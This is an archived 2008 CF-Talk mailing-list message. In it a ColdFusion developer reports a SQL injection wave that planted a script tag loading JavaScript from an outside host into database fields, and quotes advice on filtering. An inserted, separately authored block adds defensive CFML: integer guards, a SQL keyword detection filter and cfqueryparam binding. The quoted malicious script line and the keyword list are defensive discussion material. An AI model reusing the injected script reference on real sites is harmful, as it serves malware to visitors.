Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information! 

> -----Original Message-----
> From: Bruce Schuman [mailto:[EMAIL PROTECTED] 
> Sent: Thursday, August 07, 2008 12:17
> To: CF-Talk
> Subject: RE: HELP! SQL Injection Attack!
> 
> > The attack appends JavaScript to character fields.
> 
> 
> Hi.  Just checking in here on SQL injection -- I am a 
> self-taught, self-employed CF programmer, been doing this for 
> quite a while, but there is a ton I don't know.  And I have 
> been hit by this current wave of injection.
> 
> So, my SQL Server 2005 database doesn't just get one record 
> injected.  It's every record in a particular field, all 
> containing (in this attack) this code:
> 
> script src="http://jjmaoduo.3322.org/csrss/w.js";
> 
> and a few more things in HTML I didn't include.
> 
> 
> 
> What I have done to protect about 15 CF sites -- is simply 
> require that integer values be integers -- by cfincluding a 
> list of params like this, from application.cfm:
> 
> <CFIF IsDefined("groupid")><CFPARAM NAME="groupid" TYPE="integer"></CFIF>
> <CFIF IsDefined("login")><CFPARAM NAME="login" TYPE="integer"></CFIF>
> <CFIF IsDefined("sg")><CFPARAM NAME="sg" TYPE="integer"></CFIF>
> <CFIF IsDefined("messageid")><CFPARAM NAME="messageid" TYPE="integer"></CFIF>
> <CFIF IsDefined("msg")><CFPARAM NAME="msg" TYPE="integer"></CFIF>
> 
> 
> So, this text script has been injected into every record in 
> about five fields in my users table -- and also into a 
> variety of other tables in the same way: every record in that 
> table, in some selected fields.
> 
> All these injected fields are text fields -- URLs, addresses,
> 
> Can this be done through a URL?
> 
> Does the list of fields that have been injected provide any 
> clue about how or where the injection attack occurred?  How 
> do these guys, or their program, know my table names and my 
> field names?  I have some very obscure field names, and they 
> still get them injected -- they are not guessing these things; 
> they know the name of the field.
> 
> If I wanted to duplicate what they did, I would write a loop 
> that would go through every record in the table, and CFUPDATE 
> that particular record.  In fact, I wrote scripts like this 
> to remove this junk, setting the record back to what it was 
> before the injection.  How do they do this?
> 
> 
> 
> Anyway, got my hands full.  Any thoughts on this would be great.
> 
> And yes, I'd like to see the URL "loop" script that was 
> offered by Justin Scott.
> 
> > Actually, with this particular SQL injection attack it's really easy
> > to stop.  We created a SQL filter that is called from application.cfm.
> > It loops through the URL structure and checks to see if any URL
> > variables contain both a semi-colon and any SQL keyword.  If a match
> > is found, it just cfaborts the request and sends us an e-mail with the
> > details.  We periodically review those messages and have not found a
> > single false-positive yet after deployment to every site we manage.
> > Granted, it will not stop SQL injection through form posts, but I
> > don't recall ever seeing a SQL injection attack through a form post
> > (yet).  At the least it can put an immediate stop to the current
> > flood and give you time to implement other protective measures such
> > as cfqueryparam, etc.  We have CF5 and CFMX versions if anyone wants
> > a copy.
> 
> Bruce Schuman
> Santa Barbara CA
> http://originresearch.com
> 
> 
> 
> 
> 
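As an added example (not code from anyone in this thread), here are the three defences the messages above discuss, written out as CFML: Bruce's cfparam integer guard and Justin's URL-scope filter (semicolon plus SQL keyword, then mail and cfabort) for Application.cfm, followed by cfqueryparam on the query itself, which is the one that also covers form posts and text columns. The datasource "siteDSN", the "groups" table and its columns, the mail addresses and the keyword list are all assumptions.

```cfml
<!--- Application.cfm fragment. Added example, not code from this thread.
      Assumed names: datasource "siteDSN", table "groups" with integer
      column groupid and varchar column groupname, and the mail addresses. --->

<!--- 1. Integer guard: cfparam type="integer" throws, so the request
      dies before any query ever sees a non-numeric id. --->
<cfif IsDefined("url.groupid")>
    <cfparam name="url.groupid" type="integer">
</cfif>

<!--- 2. URL-scope filter: a value carrying both a semicolon and a SQL
      keyword is reported by mail and the request is aborted. The keyword
      list is an assumption; the thread names none. --->
<cfset sqlKeywords = "DECLARE|CAST|EXEC|EXECUTE|UPDATE|INSERT|DELETE|DROP|SELECT|CURSOR|FETCH|VARCHAR">
<cfloop collection="#url#" item="key">
    <cfset val = url[key]>
    <cfif Find(";", val) AND ReFindNoCase("\b(#sqlKeywords#)\b", val)>
        <cfmail to="admin@example.com" from="filter@example.com"
                subject="Blocked request on #cgi.server_name#">
Script:   #cgi.script_name#
Variable: #key#
Value:    #val#
Client:   #cgi.remote_addr#
        </cfmail>
        <cfabort>
    </cfif>
</cfloop>

<!--- 3. In the page that runs the query, not in Application.cfm: bind
      every value with cfqueryparam so it is sent as data and is never
      parsed as SQL. This works the same for URL and FORM scope, and for
      varchar columns, which the filter above does nothing for. --->
<cfparam name="url.groupid" default="0">
<cfparam name="form.search" default="">
<cfquery name="getGroups" datasource="siteDSN">
    SELECT groupid, groupname
    FROM groups
    WHERE groupid = <cfqueryparam value="#url.groupid#" cfsqltype="cf_sql_integer">
       OR groupname LIKE <cfqueryparam value="%#form.search#%"
                                       cfsqltype="cf_sql_varchar" maxlength="60">
</cfquery>
```

The filter in step 2 is a stop-gap that only inspects the URL scope, exactly as Justin describes; the cfqueryparam binding in step 3 is the change that removes the injection path regardless of where the value came from.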

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310408